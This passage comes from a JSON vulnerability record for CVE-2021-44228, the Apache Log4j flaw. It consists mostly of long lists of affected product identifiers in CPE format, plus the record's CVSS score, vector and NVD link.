"cpe:/o:debian:debian_linux:11.0", "cpe:/a:cisco:fog_director:-", "cpe:/a:siemens:energyip_prepay:3.8", "cpe:/a:cisco:emergency_responder:11.5", "cpe:/o:cisco:fxos:6.4.0", "cpe:/a:cisco:network_dashboard_fabric_controller:11.5\\(1\\)", "cpe:/a:siemens:desigo_cc_info_center:5.1", "cpe:/a:cisco:cx_cloud_agent:001.012", "cpe:/a:cisco:sd-wan_vmanage:20.4", "cpe:/a:cisco:unified_contact_center_express:12.6\\(1\\)", "cpe:/a:cisco:firepower_threat_defense:6.7.0", "cpe:/a:cisco:unified_customer_voice_portal:12.0\\(1\\)", "cpe:/a:cisco:crosswork_platform_infrastructure:4.1.0", "cpe:/a:cisco:common_services_platform_collector:002.009\\(000.001\\)", "cpe:/a:siemens:siveillance_identity:1.6", "cpe:/o:fedoraproject:fedora:34", "cpe:/a:netapp:ontap_tools:-", "cpe:/a:cisco:enterprise_chat_and_email:12.6\\(1\\)", "cpe:/o:cisco:fxos:7.0.0", "cpe:/a:cisco:paging_server:12.5\\(2\\)", "cpe:/a:cisco:wan_automation_engine:7.1.3", "cpe:/a:cisco:ucs_central_software:2.0\\(1f\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1a\\)", "cpe:/a:cisco:network_services_orchestrator:-", "cpe:/a:siemens:vesys:2019.1", "cpe:/a:cisco:unified_customer_voice_portal:12.0", "cpe:/a:cisco:network_dashboard_fabric_controller:11.4\\(1\\)", "cpe:/a:cisco:unified_computing_system:006.008\\(001.000\\)", "cpe:/a:cisco:identity_services_engine:003.002\\(000.116\\)", "cpe:/a:siemens:operation_scheduler:1.1.3", "cpe:/a:cisco:firepower_threat_defense:6.4.0", "cpe:/a:siemens:industrial_edge_management:*", "cpe:/a:cisco:emergency_responder:11.5\\(4.65000.14\\)", "cpe:/a:cisco:unified_contact_center_enterprise:12.6\\(2\\)", "cpe:/a:cisco:firepower_threat_defense:6.2.3", "cpe:/a:cisco:wan_automation_engine:7.3", "cpe:/a:cisco:evolved_programmable_network_manager:5.0", "cpe:/a:cisco:cloudcenter_suite:5.5\\(1\\)", "cpe:/a:cisco:iot_operations_dashboard:-", "cpe:/a:siemens:solid_edge_harness_design:2020", "cpe:/a:cisco:smart_phy:3.1.5", "cpe:/a:cisco:cyber_vision_sensor_management_extension:4.0.2", 
"cpe:/a:cisco:firepower_threat_defense:6.6.0", "cpe:/a:cisco:identity_services_engine:002.007\\(000.356\\)", "cpe:/a:netapp:snapcenter:-", "cpe:/a:cisco:unified_customer_voice_portal:12.6\\(1\\)", "cpe:/a:cisco:unified_sip_proxy:010.000\\(001\\)", "cpe:/a:cisco:crosswork_network_automation:4.1.0", "cpe:/a:netapp:cloud_manager:-", "cpe:/a:siemens:nx:*", "cpe:/a:cisco:common_services_platform_collector:002.009\\(001.002\\)", "cpe:/a:cisco:connected_analytics_for_network_deployment:008.000.000.000.004", "cpe:/a:siemens:sentron_powermanager:4.2", "cpe:/a:cisco:unity_connection:11.5\\(1.10000.6\\)", "cpe:/a:netapp:active_iq_unified_manager:-", "cpe:/a:siemens:siveillance_viewpoint:*", "cpe:/a:cisco:unified_contact_center_express:12.5\\(1\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1h\\)", "cpe:/a:siemens:desigo_cc_advanced_reports:5.0", "cpe:/a:cisco:evolved_programmable_network_manager:5.1", "cpe:/a:cisco:firepower_threat_defense:7.0.0", "cpe:/a:cisco:cloudcenter_suite:5.5\\(0\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1e\\)", "cpe:/a:cisco:identity_services_engine:002.006\\(000.156\\)", "cpe:/a:cisco:unified_intelligence_center:12.6\\(2\\)", "cpe:/a:netapp:cloud_insights:-", "cpe:/a:cisco:connected_analytics_for_network_deployment:006.004.000.003", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.003.003", "cpe:/a:cisco:video_surveillance_manager:7.14\\(2.26\\)", "cpe:/a:cisco:integrated_management_controller_supervisor:002.003\\(002.000\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1c\\)", "cpe:/a:cisco:ucs_central_software:2.0\\(1d\\)", "cpe:/a:cisco:common_services_platform_collector:002.010\\(000.000\\)", "cpe:/a:percussion:rhythmyx:7.3.2", "cpe:/a:cisco:network_dashboard_fabric_controller:11.0\\(1\\)", "cpe:/a:cisco:crosswork_network_controller:3.0.0", "cpe:/a:siemens:sipass_integrated:2.85"], "id": "CVE-2021-44228", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44228", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:log4j:2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:9.1\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.002\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_controller:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:intel:sensor_solution_firmware_development_kit:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.002\\(000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:solid_edge_cam_pro:*:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:opcenter_intelligence:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:logo\\!_soft_comfort:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_control_pro:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sipass_integrated:2.80:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:-:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release1:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:-:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:21.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0:beta9:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.5\\(1\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:optical_network_controller:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:intel:system_debugger:-:*:*:*:*:*:*:*", 
"cpe:2.3:a:cisco:firepower_threat_defense:6.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.3\\(0\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_4:4.70:-:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sentron_powermanager:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release2:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager_im_and_presence_service:11.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.000\\(000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:xpedition_package_integrator:-:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.5\\(1\\):su1:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1k\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siguard_dsa:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:9.0\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:broadworks:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cyber_vision:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:data_center_network_manager:11.3\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:8.7:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.21900.40\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:vesys:2019.1:-:*:*:*:*:*:*", "cpe:2.3:a:siemens:comos:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_computing_system:006.008\\(001.000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:virtual_topology_system:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1f\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):*:*:*:*:*:*:*", 
"cpe:2.3:a:cisco:paging_server:8.3\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.5\\(1\\):su1:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\)su3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:-:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_viewpoint:*:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:14.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:session_management:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.6\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cyber_vision_sensor_management_extension:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:003.001\\(000.518\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:intel:audio_development_kit:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:emergency_responder:11.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unity_connection:11.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1l\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_7:2.30:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:integrated_management_controller_supervisor:002.003\\(002.000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.1\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:11.6:*:*:*:*:*:*:*", 
"cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.5\\(0\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_insights_for_data_center:6.0\\(2.1914\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.002\\(001\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.18900.97\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:captial:2019.1:-:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip_prepay:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:packaged_contact_center_enterprise:11.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:intersight_virtual_appliance:1.0.9-343:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):es02:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:12.5\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es02:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release4:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:003.000\\(000.458\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.001\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:11.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:11.6\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:intel:computer_vision_annotation_tool:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(4.018\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(2.26\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_assurance_engine:6.0\\(2.1912\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.001\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:9.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_info_center:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_7:2.30:-:*:*:*:*:*:*", 
"cpe:2.3:a:netapp:cloud_insights:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.17900.52\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:003.002\\(000.116\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_secure_agent:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.000\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:teamcenter:*:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1a\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:8.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.010\\(000.000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:002.007\\(000.356\\):-:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release1:*:*:*:*:*:*", "cpe:2.3:a:intel:oneapi_sample_browser:-:*:*:*:*:eclipse:*:*", "cpe:2.3:a:cisco:unified_workforce_optimization:11.5\\(1\\):sr7:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.6\\(1\\):*:*:*:*:*:*:*", 
"cpe:2.3:a:cisco:webex_meetings_server:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch5:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.18119.2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_3:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:8.4\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.7:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:industrial_edge_management:*:*:*:*:*:*:*:*", "cpe:2.3:a:intel:genomics_kernel_library:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:emergency_responder:11.5\\(4.65000.14\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:head-end_system_universal_device_integration_system:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_4:4.70:sp7:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.22900.28\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):es01:*:*:*:*:*:*", "cpe:2.3:a:siemens:energy_engage:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:8.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000.000.004:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(2\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.002.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_management_portal:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.000\\(001\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unity_connection:11.5\\(1.10000.6\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.4\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:netapp:ontap_tools:-:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:cisco:integrated_management_controller_supervisor:2.3.2.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:cisco:crosswork_network_automation:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1h\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip_prepay:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1b\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:automated_subsea_tuning:02.01.00:*:*:*:*:*:*:*", "cpe:2.3:a:intel:secure_device_onboard:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:enterprise_chat_and_email:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:solid_edge_harness_design:2020:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1c\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_identity:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_data_gateway:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siguard_dsa:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:4.10\\(0.15\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.001.000:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.5.0:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cx_cloud_agent:001.012:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.004.000.003:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1g\\):*:*:*:*:*:*:*", 
"cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.000\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_info_center:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.4\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:002.006\\(000.156\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1e\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_7:2.30:sp2:*:*:*:*:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(1.26\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_services_orchestrator:-:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:mendix:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:solid_edge_harness_design:2020:sp2002:*:*:*:*:*:*", "cpe:2.3:a:siemens:xpedition_enterprise:-:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:sppa-t3000_ses3000_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sipass_integrated:2.85:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:solid_edge_harness_design:2020:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:prime_service_catalog:12.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_2:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_optimization_engine:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:iot_operations_dashboard:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siguard_dsa:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_mobile_experiences:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\\(1.22900.6\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:enterprise_chat_and_email:12.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.001.001:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):-:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release2:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(3.025\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release3:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_platform_infrastructure:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:emergency_responder:11.5\\(4.66000.14\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_command:4.16.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es03:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.5:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:siemens:siveillance_vantage:*:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.000.001:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sentron_powermanager:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.003:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:captial:2019.1:sp1912:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:002.004\\(000.914\\):-:*:*:*:*:*:*", "cpe:2.3:a:intel:system_studio:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:dna_spaces_connector:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.5\\(1\\):su2:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(3\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_identity:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch4:*:*:*:*:*:*", 
"cpe:2.3:o:cisco:fxos:6.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.2\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.3\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1d\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:mobility_services_engine:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:vesys:2019.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.002\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_zero_touch_provisioning:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:fog_director:-:*:*:*:*:*:*:*", 